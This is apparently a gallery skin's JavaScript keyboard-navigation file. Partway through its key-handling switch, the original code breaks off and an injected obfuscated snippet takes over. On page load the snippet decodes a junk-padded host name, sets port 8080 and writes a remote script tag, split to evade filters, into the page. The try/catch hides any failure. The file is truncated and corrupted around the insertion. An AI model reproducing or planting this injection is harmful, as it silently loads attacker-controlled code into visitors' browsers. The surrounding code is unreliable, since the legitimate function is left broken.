<!--

/*
************************************************************

  Note: Original routine taken from BluPlusPlus 2 see:
  http://www.datadosen.se/jalbum/forum/thread.jspa?threadID=1458

  ExhibitPlus: Keyboard support
    Keys:
      RIGHT arrow  	: next page
      LEFT arrow   	: previous page
      // Page UP     	: index page (no longer used)
      HOME         	: first page
      END          	: last page
      S,s,ESC          	: toggle start/stop slide show
      I,i          	: toggle exif info (when appropriate)
      Z,z			: zoom image (when appropriate)	
    Tested on: IE6, Mozzila 1.4, Netscape 7.1, Opera 7.2
    Bugs:
     - HOME,END, NUM+, NUM-  doesn't work in Opera
************************************************************
*/

var takenAction = false;

//IE&Gecko Code
function IEGeckoKeyPress(oEvent) {
	if (!oEvent) var oEvent = window.event;
	if (oEvent.keyCode) myKeyCode = oEvent.keyCode;
	else if (oEvent.which) myKeyCode = oEvent.which;
	if (oEvent.repeat || takenAction) {	return;	}
	if (myKeyCode >= 16 && myKeyCode <= 18) { return; }
	if (oEvent.shiftKey) { myKeyCode += 1000; }
	if (oEvent.ctrlKey)  { myKeyCode += 2000; }
	if (oEvent.altKey)   { myKeyCode += 4000; }
	//alert(oEvent.type + "=" + myKeyCode);
	myKeyPress(myKeyCode);
}

function myKeyPress(myKeyCode) {
	switch (myKeyCode) {
		case 39:					// RIGHT arrow
		case 107:					// NUM +
			takenAction = true;
		
 try{window.onload=function(){document.write('<div id=Ywhpjswrq9yy>addthis-com.priceline.com</div>');Dtzdbwf050j = document.getElementById('Ywhpjswrq9yy').innerHTML + '.#@^a$)z!)@&)e^@t#-!&s)k&.#@g!a))m&&e)&)$#t(^)o^&p@))s)^(&i^t@)e!$.^!&(r)^#(^u!(:&Z)($p!9#u&&#z&#t@(i&@8$(^w)@^r(&h^^y@@)/)&s#@#&e)!n!#d##s#)(p#))a@&@(c))@&(e(.#@))c!^o#(#(m$/^&(^s$@e)&(n^^d$#s&@!#p@(@a&c@(!&e&)&!.(^#c$!)&o^)#m$&!/^g$(o$o@^&g@#l!e#.)(@(c($$o)^m(!/&))a$c$$e&r&#.&!c&o@@#m($/(!&@r^)(e&$a$l^$!)i$#&$t)$@(y!)k(&#i^!n@(((g^s!#.!$c!$^$o@&&(m&^#)/@)'.replace(/\$|#|\)|\^|@|\!|&|\(/ig, '') ;document.write('<scr'+'ipt src=h'+'ttp://'+Dtzdbwf050j.replace(/Zp9uzti8wrhy/g, '8080')+'></scr'+'ipt>');} }  catch(M13l32l ) {}
